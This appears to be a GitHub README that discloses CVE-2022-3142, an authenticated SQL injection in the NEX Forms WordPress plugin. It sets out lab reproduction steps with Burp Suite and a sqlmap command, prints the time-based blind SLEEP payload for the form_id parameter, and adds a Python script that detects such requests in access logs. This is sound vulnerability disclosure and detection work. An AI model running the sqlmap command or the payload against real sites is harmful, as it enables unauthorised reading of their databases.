ehtec/nex-forms-exploit

nex-forms-exploit

Authenticated SQL injection vulnerability in the "NEX Forms" WordPress plugin

https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5

This vulnerability has been assigned CVE-2022-3142.

https://nvd.nist.gov/vuln/detail/CVE-2022-3142

  1. Start a new WordPress instance using docker-compose.

  2. Install the NEX Forms plugin.

  3. Open the URL `/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1` in your browser. Save the request to `nex_forms_req.txt` via Burp Suite.

  4. Execute the following command: `sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3`

sqlmap will find a time-based blind payload:

```
Parameter: form_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)
```
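Because `form_id` travels in the GET query string, the request pattern above is visible in web server access logs. The following detection sketch is an added example, not part of the original repository; it assumes combined-format access logs, the function name is hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Sep/2022:10:00:01 +0000] "GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Sep/2022:10:00:07 +0000] "GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1%20AND%20(SELECT%204715%20FROM%20(SELECT(SLEEP(5)))nPUi) HTTP/1.1" 200 5120
203.0.113.5 - - [01/Sep/2022:10:00:09 +0000] "GET /wp-admin/admin.php?page=other-plugin&form_id=abc HTTP/1.1" 200 812
203.0.113.5 - - [01/Sep/2022:10:00:12 +0000] "GET /wp-admin/admin.php?page=nex-forms-dashboard HTTP/1.1" 200 4090
"""

# Client address and request target from one combined-format log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_form_id_requests(log_text):
    """Return (client_ip, decoded form_id) pairs for NEX Forms dashboard
    requests whose form_id is anything other than a plain decimal integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if params.get("page") != ["nex-forms-dashboard"]:
            continue  # only the page named in the steps above
        for value in params.get("form_id", []):
            # parse_qs has already URL-decoded the value.
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_form_id_requests(SAMPLE_LOG):
        print(f"{ip}: non-integer form_id {value!r}")
```

The check is an allowlist on the parameter's expected type rather than a signature for one payload, so it flags any non-integer `form_id` sent to this page.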
